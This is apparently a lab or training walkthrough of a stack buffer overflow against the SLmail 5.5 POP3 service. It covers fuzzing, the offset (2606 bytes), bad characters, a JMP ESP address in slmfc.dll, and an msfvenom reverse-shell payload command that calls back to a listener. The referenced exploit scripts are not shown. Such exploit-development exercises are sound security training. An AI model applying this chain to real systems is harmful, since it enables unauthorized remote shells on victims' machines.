Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3
Simple STACK BAsed BUffer Overflow Step By Step
In the very First Step we will Fuzz The Application With a Simple Spike Script
meanwhile we wil also have SLmail attached[and running] to immunity Debugger
More On Spike:: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/
In Here is a Simple Spike Script named spike_fuzz.spk
we will run it against the application using command
line_send_tcp 192.168.1.117 110 spike_fuzz.spk
where 192.168.1.117 is the IP of Target Machine Running SLMail and it is Running On Port 110
Meanwhile if we see immunity we will see that the application has crashed
Now we will create a python POC that Replicates the crash and calculates the bytes at which the application crashes
python poc_crash.py
For Finding the offset we will utilize msf
1. First Generate a pattern
2. Note the EIP
3. Query that EIP and Length with MSF to Find the Offset
msf-pattern_create -l 2700
In poc_offset.py we will utilize this pattern as our Overflow Buffer!
python poc_offset.py
At this Point we also Note the EIP Value in immunity where the Application has crashed and paused
EIP is 39694438
::For Finding Offset::
msf-pattern_offset -l 2700 -q 39694438
offset is 2606 means 2606 bytes Before we reach EIP::: and EIP itself is 4bytes Long
Now we will Try TO Overwrite the EIP with 4B's ie:: in immunity we should have 42424242 {Hex for 4 B's}
python poc_eip_control.py
And Now if we Check immunity
To keep this simple and short
You can run the poc_badchars.py script and then Find Bad Chrachters yourself
For Keeping this short
This application has two bad charachters {which are also the default ones} when we run the poc_badchars.py first time we will see that the charcahter \x0a acts up and then we will remove this from our bad chars payload and then run the script again ,,, second time we will see that the charcahter \x0d is skipped so this is our second bad char and we remove it from our payload :: after this when we run the script third time everything is clear and good!!
badchars are :: \x00\x0a\x0d
{nullbyte, Line feed, carriage return}
python poc_badchars.py
First we Find the right Module using Mona Modules in immunity
slmfc.dll is the most appropriate candidate as it does not have memory protections!
and now we find a JMP ESP address in this DLL
This address will be written to EIP so that we can redirect the Execution of Program to ESP which will result in the Execution of our shellcode!
!mona find -s "\xff\xe4" -m slmfc.dll
{\xff\xe4 opcode equivalent of JMP ESP}
from 19 pointer addresses we choose the First one
Now We will Put all this Together and Drop a Shell
1.) generate the shell code {excluding badchars}
2.) adding the address we Found {remeber Little Endian}
3.) Add the buffer , return address, some nop-sleds, shellcode
4.) we have a shell
Lets Quicly Generate shell code using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<lstening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"
WE put everything together in exploit.py File
Now this time we run SLmail without immunity and also Listen For Incoming Conncections simuntaneously
once done with This we will run the Final exploit.py script!
EXCELLENT WE HAVE A SHELL!